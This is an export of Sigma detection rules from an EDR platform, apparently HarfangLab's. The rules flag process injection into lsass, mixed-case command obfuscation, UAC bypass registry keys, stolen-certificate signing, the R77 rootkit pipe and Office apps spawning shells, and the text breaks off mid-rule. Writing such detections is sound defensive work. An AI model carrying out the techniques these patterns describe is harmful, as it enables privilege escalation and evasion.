"content": "title: Suspicious Remote Thread Created in Sensitive Process\nid: 8f01bb75-5129-4ec1-bf05-a350afd2e6f3\ndescription: |\n Detects suspicious remote threads that are not mapped to a legitimate DLL/executable created in sensitive processes.\n Adversaries may inject malicious code in another processes to steal sensitive information, evade defenses, elevate privileges or perform malicious activity within a legitimate process.\n It is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/12/11\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith:\n - '\\lsass.exe'\n - '\\winlogon.exe'\n - '\\trustedinstaller.exe'\n - '\\wininit.exe'\n - '\\services.exe'\n - '\\smss.exe'\n - '\\csrss.exe'\n\n filter_module:\n StartModule|contains:\n - '.dll'\n - '.exe'\n - '.com'\n\n exclusion_security_product:\n SourceImage:\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\appprotection.exe'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\entryprotect.exe'\n - '?:\\Program Files (x86)\\Citrix\\Online Plugin\\ICA Client\\appprotection.exe'\n - '?:\\Program Files (x86)\\Citrix\\Online Plugin\\ICA Client\\entryprotect.exe'\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\PSNMVInj.dll'\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\PSNAEInj64.dll'\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\helper_64.exe'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Receiver\\appprotection.exe'\n - '?:\\Program Files (x86)\\F-Secure\\Client Security\\Ultralight\\ulcore\\\\*\\fsulprothoster.exe'\n - '?:\\Program Files (x86)\\F-Secure\\Server Security\\Ultralight\\ulcore\\\\*\\fsulprothoster.exe'\n - '?:\\Program Files (x86)\\F-Secure\\PSB\\Ultralight\\ulcore\\\\*\\fsulprothoster.exe'\n - '?:\\Program Files (x86)\\0patch\\Agent\\0patchServicex64.exe'\n - '?:\\Program Files\\Cisco\\AMP\\\\*\\sfc.exe'\n\n exclusion_wmiprvse:\n SourceImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_logmein:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'LogMeIn, Inc.'\n - 'GoTo Technologies USA, LLC'\n\n exclusion_fsecure:\n ProcessProcessName:\n - 'fshoster64.exe'\n - 'FSHDLL64.EXE'\n - 'fshoster32.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'WithSecure Oyj'\n - 'F-Secure Corporation'\n\n exclusion_windhawk:\n - ProcessProcessName: 'windhawk.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Michael Maltsev'\n - 'Open Source Developer, Michael Maltsev'\n - ProcessImage: '?:\\Program Files\\Windhawk\\windhawk.exe'\n ProcessCompany: 'Ramen Software'\n TargetImage: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n\n exclusion_netsupport:\n ProcessImage: '?:\\Program Files\\NetSupport\\NetSupport Manager\\client32.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NetSupport Ltd'\n\n exclusion_artistscope:\n ProcessImage: '?:\\Program Files\\Common Files\\ArtistScope\\CSHelper64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ArtistScope Pty Ltd'\n\n exclusion_mcafee:\n ProcessImage:\n - '?:\\Program Files\\McAfee\\DLP\\Agent\\fcags.exe'\n - '?:\\Program Files\\McAfee\\Host Intrusion Prevention\\FireSvc.exe'\n - '*\\McAfee\\Endpoint Security\\Threat Prevention\\mfetp.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\\\*\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfeeTmpInstall_Threat Prevention\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfeeTmpInstall_Common\\mfeepmpk_utility.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'Musarubra US LLC'\n\n exclusion_warsaw:\n ProcessImage:\n - '?:\\Program Files (x86)\\Topaz OFD\\Warsaw\\core.exe'\n - '?:\\Program Files\\Topaz OFD\\Warsaw\\core.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TPZ SOLUCOES DIGITAIS LTDA'\n\n exclusion_btpass:\n ProcessImage: '?:\\Windows\\BTPass\\x64\\BTPassSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'QUEST SOFTWARE INC.'\n - 'QUEST SOFTWARE, INC.'\n\n exclusion_panda:\n ProcessImage: '?:\\Program Files (x86)\\Panda Security\\WAC\\helper_64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Panda Security, S.L.U'\n\n exclusion_ivanti:\n ProcessImage: '?:\\Program Files\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgentAssist.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_netop:\n ProcessImage: '?:\\Program Files (x86)\\Netop\\Netop Remote Control\\Host\\NHOSTSVC.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'NETOP BUSINESS SOLUTIONS A/S'\n\n exclusion_roblox:\n ProcessImage|endswith: '\\RobloxPlayerBeta.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Roblox Corporation'\n\n exclusion_radmin:\n ProcessImage|endswith: '\\rserver3.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Famatech International Corp.'\n TargetImage: '?:\\Windows\\System32\\winlogon.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f01bb75-5129-4ec1-bf05-a350afd2e6f3",
"rule_name": "Suspicious Remote Thread Created in Sensitive Process",
"rule_description": "Detects suspicious remote threads that are not mapped to a legitimate DLL/executable created in sensitive processes.\nAdversaries may inject malicious code in another processes to steal sensitive information, evade defenses, elevate privileges or perform malicious activity within a legitimate process.\nIt is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\n",
"rule_creation_date": "2023-12-11",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f0ba3e3-bdb8-4dfa-bdab-69e77fd82f98",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069841Z",
"creation_date": "2026-03-23T11:45:34.069844Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069848Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.logpoint.com/en/blog/emerging-threats/hiding-in-plain-sight-the-subtle-art-of-loki-malwares-obfuscation/",
"https://attack.mitre.org/techniques/T1027/010/"
],
"name": "t1027_010_commandline_obf_uppercase.yml",
"content": "title: Suspicious Obfuscated Command-line using Uppercase and Lowercase Characters\nid: 8f0ba3e3-bdb8-4dfa-bdab-69e77fd82f98\ndescription: |\n Detects the possible obfuscation of a process command-line using alternating lower and uppercase letters.\n Attackers often try to evade defenses by changing the case of letters composing their command-line, supposing that security solutions use case senstive patterns.\n It is recommended to analyze the detected process and look for malicious behavior or content.\nreferences:\n - https://www.logpoint.com/en/blog/emerging-threats/hiding-in-plain-sight-the-subtle-art-of-loki-malwares-obfuscation/\n - https://attack.mitre.org/techniques/T1027/010/\ndate: 2024/01/12\nmodified: 2025/07/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Obfuscation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # Case insensitive filter\n selection_powershell:\n OriginalFileName: 'powershell.exe'\n CommandLine|contains: 'powershell'\n # Filter out known occurences\n filter_powershell:\n CommandLine|re:\n - 'PowerShell'\n - 'powershell'\n - 'Powershell'\n - 'powerShell'\n - 'POWERSHELL'\n\n selection_encodedcommand:\n OriginalFileName: 'powershell.exe'\n CommandLine|contains: '-encodedcommand'\n filter_encodedcommand:\n CommandLine|re:\n - '-EncodedCommand'\n - '-encodedCommand'\n - '-encodedcommand'\n\n selection_cmd:\n OriginalFileName: 'cmd.exe'\n CommandLine|contains: 'cmd.exe'\n filter_cmd:\n CommandLine|re:\n - 'Cmd\\.exe'\n - 'Cmd\\.EXE'\n - 'cmd\\.EXE'\n - 'cmd\\.exe'\n - 'cmd\\.Exe'\n - 'CMD\\.EXE'\n - 'CMD\\.exe'\n - 'Cmd\\.Exe'\n\n selection_wscript:\n OriginalFileName: 'wscript.exe'\n CommandLine|contains: 'wscript'\n filter_wscript:\n CommandLine|re:\n - 'WScript'\n - 'Wscript'\n - 'wscript'\n - 'WSCRIPT'\n\n selection_ping:\n # cmd /c XXX && ping XXX\n OriginalFileName: 'cmd.exe'\n CommandLine|contains: 'ping '\n filter_ping:\n CommandLine|re:\n - 'ping '\n - 'PING '\n - 'Ping '\n\n selection_rundll32:\n # cmd /c XXX && RuNDll32 XXX\n OriginalFileName: 'cmd.exe'\n CommandLine|contains: 'rundll32'\n filter_rundll32:\n CommandLine|re:\n - 'RUNDLL32'\n - 'rundll32'\n - 'RunDll32'\n - 'RunDLL32'\n - 'runDLL32'\n - 'Rundll32'\n\n selection_echo:\n # cmd /c XXX && echo XXX\n OriginalFileName: 'cmd.exe'\n CommandLine|contains: 'echo '\n filter_echo:\n CommandLine|re:\n - 'echo'\n - 'ECHO'\n - 'Echo'\n\n condition: (selection_powershell and not filter_powershell) or\n (selection_encodedcommand and not filter_encodedcommand) or\n (selection_cmd and not filter_cmd) or\n (selection_wscript and not filter_wscript) or\n (selection_ping and not filter_ping) or\n (selection_rundll32 and not filter_rundll32) or\n (selection_echo and not filter_echo)\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f0ba3e3-bdb8-4dfa-bdab-69e77fd82f98",
"rule_name": "Suspicious Obfuscated Command-line using Uppercase and Lowercase Characters",
"rule_description": "Detects the possible obfuscation of a process command-line using alternating lower and uppercase letters.\nAttackers often try to evade defenses by changing the case of letters composing their command-line, supposing that security solutions use case senstive patterns.\nIt is recommended to analyze the detected process and look for malicious behavior or content.\n",
"rule_creation_date": "2024-01-12",
"rule_modified_date": "2025-07-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1027.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f127aec-f4a0-4c97-b4be-a82c64718b3b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092401Z",
"creation_date": "2026-03-23T11:45:34.092403Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092408Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_ms_settings_user_command.yml",
"content": "title: Ms-settings UAC Bypass Prepared\nid: 8f127aec-f4a0-4c97-b4be-a82c64718b3b\ndescription: |\n Detects the preparation of the ms-settings UAC bypass, involving the setting of multiple registry keys.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/10\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\ms-settings\\shell\\open\\command\\(Default)'\n - 'HKU\\\\*\\ms-settings\\\\*SymbolicLinkValue'\n - 'HKU\\\\*\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\ms-settings\\UserChoice\\ProgId'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n selection_rename:\n EventType: 'RenameValue'\n NewName: 'HKU\\\\*_Classes\\ms-settings\\\\*'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: (selection_set_value and not filter_empty) or selection_rename and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f127aec-f4a0-4c97-b4be-a82c64718b3b",
"rule_name": "Ms-settings UAC Bypass Prepared",
"rule_description": "Detects the preparation of the ms-settings UAC bypass, involving the setting of multiple registry keys.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-10",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.001",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f2672a6-33bf-4bf6-a57e-c7b8960c8907",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078448Z",
"creation_date": "2026-03-23T11:45:34.078450Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078455Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_nvidia_stolen_cert_process_execution.yml",
"content": "title: Process Executed Signed with NVIDIA Stolen Certificate\nid: 8f2672a6-33bf-4bf6-a57e-c7b8960c8907\ndescription: |\n Detects the execution of a process using one of NVIDIA's stolen certificates.\n This can be the sign of a malware using a fake signature to evade AV/EDR detection.\n It is recommended to investigate the binary to determine its legitimacy, for instance by determining whether this file may be part of a legitimate but legacy NVIDIA component.œ\nreferences:\n - https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/12\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_cert_1:\n ProcessSignatureSignerThumbprint: '579aec4489a2ca8a2a09df5dc0323634bd8b16b7'\n\n selection_timestamp_filter_cert_1:\n ProcessPETimestampStr|startswith:\n - '2011-'\n - '2012-'\n - '2013-'\n - '2014-01'\n - '2014-02'\n - '2014-03'\n - '2014-04'\n - '2014-05'\n - '2014-06'\n - '2014-07'\n - '2014-08'\n\n selection_cert_2:\n ProcessSignatureSignerThumbprint: '30632ea310114105969d0bda28fdce267104754f'\n\n selection_timestamp_filter_cert_2:\n ProcessPETimestampStr|startswith:\n - '2015-07'\n - '2015-08'\n - '2015-09'\n - '2015-10'\n - '2015-11'\n - '2015-12'\n - '2016-'\n - '2017-'\n - '2018-01'\n - '2018-02'\n - '2018-03'\n - '2018-04'\n - '2018-05'\n - '2018-06'\n - '2018-07'\n\n filter_copyright:\n ProcessLegalCopyright|contains:\n - 'NVIDIA'\n - 'Galasoft'\n\n filter_path:\n Image:\n - '?:\\Windows\\System32\\nvwmi64.exe'\n # C:\\Program Files (x86)\\NVIDIA Corporation\\NvNode\\NVIDIA Web Helper.exe\n - '?:\\Program Files (x86)\\NVIDIA Corporation\\NvNode\\\\*'\n\n condition: ((selection_cert_1 and not selection_timestamp_filter_cert_1) or (selection_cert_2 and not selection_timestamp_filter_cert_2)) and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f2672a6-33bf-4bf6-a57e-c7b8960c8907",
"rule_name": "Process Executed Signed with NVIDIA Stolen Certificate",
"rule_description": "Detects the execution of a process using one of NVIDIA's stolen certificates.\nThis can be the sign of a malware using a fake signature to evade AV/EDR detection.\nIt is recommended to investigate the binary to determine its legitimacy, for instance by determining whether this file may be part of a legitimate but legacy NVIDIA component.œ\n",
"rule_creation_date": "2022-07-12",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f283fa9-b41e-4246-bfc9-b4489a85db7d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093640Z",
"creation_date": "2026-03-23T11:45:34.093642Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093646Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_wow64log.yml",
"content": "title: UAC Bypass Executed via wow64log.dll Hijacking\nid: 8f283fa9-b41e-4246-bfc9-b4489a85db7d\ndescription: |\n Detects the execution of the wow64log.dll UAC bypass, involving the hijacking of the DLL by a SysWoW64 application.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the creation of the DLL as well as the DLL itself look for malicious content or actions.\nreferences:\n - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/11\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|startswith: '?:\\Windows\\SysWOW64\\'\n ImageLoaded: '?:\\Windows\\System32\\wow64log.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f283fa9-b41e-4246-bfc9-b4489a85db7d",
"rule_name": "UAC Bypass Executed via wow64log.dll Hijacking",
"rule_description": "Detects the execution of the wow64log.dll UAC bypass, involving the hijacking of the DLL by a SysWoW64 application.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the creation of the DLL as well as the DLL itself look for malicious content or actions.\n",
"rule_creation_date": "2020-09-11",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f319367-4b99-4eab-be5b-1cd8295d577a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087888Z",
"creation_date": "2026-03-23T11:45:34.087890Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087894Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit",
"https://twitter.com/malmoeb/status/1523179260273254407",
"https://github.com/bytecode77/r77-rootkit",
"https://attack.mitre.org/techniques/T1014/"
],
"name": "t1014_r77_named_pipes_connected.yml",
"content": "title: Named Pipe Connected linked to R77 Rootkit\nid: 8f319367-4b99-4eab-be5b-1cd8295d577a\ndescription: |\n Detects connection to a Named Pipe pertaining to the R77 ring3 rootkit.\n R77 is an open source userland rootkit that is being used to hide the presence of other software on a system by hooking multiple Windows APIs.\n It is recommended to investigate the process that connected to the named pipe to determine its legitimacy.\nreferences:\n - https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit\n - https://twitter.com/malmoeb/status/1523179260273254407\n - https://github.com/bytecode77/r77-rootkit\n - https://attack.mitre.org/techniques/T1014/\ndate: 2022/07/18\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1014\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Rootkit.R77\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: named_pipe_connection\n product: windows\ndetection:\n selection:\n PipeName: '\\$77control'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f319367-4b99-4eab-be5b-1cd8295d577a",
"rule_name": "Named Pipe Connected linked to R77 Rootkit",
"rule_description": "Detects connection to a Named Pipe pertaining to the R77 ring3 rootkit.\nR77 is an open source userland rootkit that is being used to hide the presence of other software on a system by hooking multiple Windows APIs.\nIt is recommended to investigate the process that connected to the named pipe to determine its legitimacy.\n",
"rule_creation_date": "2022-07-18",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1014",
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f4677ab-ed23-4357-929d-c15459d867f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628319Z",
"creation_date": "2026-03-23T11:45:34.628321Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628325Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "t1104_office_application_spawning_malicious_processes.yml",
"content": "title: Dangerous Process Started by Microsoft Office Application\nid: 8f4677ab-ed23-4357-929d-c15459d867f3\ndescription: |\n Detects suspicious child processes spawned by Microsoft Office applications (Word, Excel, Powerpoint, Publisher, Visio, ...), which may indicate the execution of malicious code via phishing documents or macro abuse.\n This behavior is commonly observed in attacks leveraging weaponized Office files to download or execute additional payloads.\n It is recommended to investigate the command-line as well as to correlate this alert with other commands executed around it to determine its legitimacy.\nreferences:\n - https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\n - https://attack.mitre.org/techniques/T1203/\ndate: 2020/09/30\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.initial_access\n - attack.t1203\n - attack.t1204.002\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_parent:\n ParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\POWERPNT.EXE'\n - '\\VISIO.EXE'\n - '\\EQNEDT32.EXE' # related to CVE 2017-11882\n - '\\GRAPH.EXE'\n - '\\MSPUB.exe'\n - '\\WINPROJ.exe'\n - '\\WORDPAD.exe'\n\n selection_image:\n - Image|endswith:\n # cmd + scripts\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n # persistence\n - '\\schtasks.exe'\n - '\\regsvr32.exe' # lolbas squiblydoo\n - '\\wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - '\\mshta.exe'\n - 